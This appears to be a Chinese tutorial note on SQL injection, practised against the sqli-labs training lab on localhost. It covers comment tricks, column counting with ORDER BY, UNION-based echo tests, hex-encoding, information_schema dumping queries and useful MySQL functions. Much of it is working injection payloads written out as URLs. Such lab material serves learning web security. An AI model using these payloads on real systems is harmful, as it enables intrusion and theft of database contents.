1)、前期准备、知识点
开始之前,为了方便查看sql注入语句,我在sqli-labs-master网页源码php部分加了两行代码,第一行意思是输出数据库语句,第二行是换行符
一、Mysql 登录
1、明文密码 在bin目录下 输入:mysql -u 账户 -p 密码
2、**密码 在bin目录下 输入:mysql -u 账户 -p 后回车再输入密码
二、注释符
–+ – # 都是SQL语句的注释符 ,sql语句运行到此结束。
三、and or
A and B A,B都Ture 结果才为Ture
A or B A,B 有一个Ture 结果就为Ture
四、limit
limit m,n :显示从m列开始 显示n行
五、 ?id=1 后加 ’
可以判断存在SQL漏洞,
例如:http://localhost/sqli-labs-master/Less-1/?id= 1’or 1=1 --+
sql语句:SELECT * FROM users WHERE id=’ 1’or 1=1 – ’ LIMIT 0,1
六、order by
order by + n : 查询结果根据第n列排序
order by 可判断数据表 列数
在尝试是N值折半测试
例:http://localhost/sqli-labs-master/Less-1/?id=1’order by 3 --+
SELECT * FROM users WHERE id='1’order by 3 – ’ LIMIT 0,1
七、union 联合查询
在使用 order by 测试出列数后,使用 union + 数字 查看回显信息,测试回显的哪几列,
错误示例:http://localhost/sqli-labs-master/Less-1/?id=1’union select 1,2,3–+
如图,在id值正确时 由于limit 0,1只能显示一行,回显结果无法做出正确判断
正确示例:http://localhost/sqli-labs-master/Less-1/?id=-1’union select 1,2,3–+
如图,将id值设置为-1(即不存在值),结果回显为第2、3列
九、’ 部分 特殊字符部分转化为十六进制
注:在SQL注入时 如需 ’ ’ 单引号括住内容 尽量转化为16进制(0x+内容的十六进制)
方式如下:
十、暴库SQL语句
查库:select schema_name from information_schema.schemata
查表:select table_name from information_schema.tables where table_schema=‘库名’
查列:select column_name from information_schema.columns where table_name=‘表名’
查字段:select 列1,列2,列3 from 库名.表名
注:引号包裹部分 整体使用十六进制代替 如 table_schema=‘security’ -> table_schema=0x7365637572697479
十一、SQL常用函数
查询函数
1.version() --Mysql版本
2.user() --数据库用户名
3.database() --数据库名
[email protected]@datadir --数据库安装路径
[email protected]@version_compile_os --操作系统的版本
字符串连接函数:
1.concat(字符串1,字符串2) --没有分隔符的连接字符串
2.concat_ws(-/~,字符串1,字符串2) --含有分隔符的连接字符串
3.group_concat(字符串1,字符串2) --连接一个组的所有字符串,并用,分隔每一个字符。
例:select 1,2,group_concat(concat_ws(0x2d2d,id,username,password)) from security.users
使用及区别详情见:https://baijiahao.baidu.com/s?id=1595349117525189591&wfr=spider&for=pc
本文参考于:https://www.cnblogs.com/yyd-sun/p/12256407.html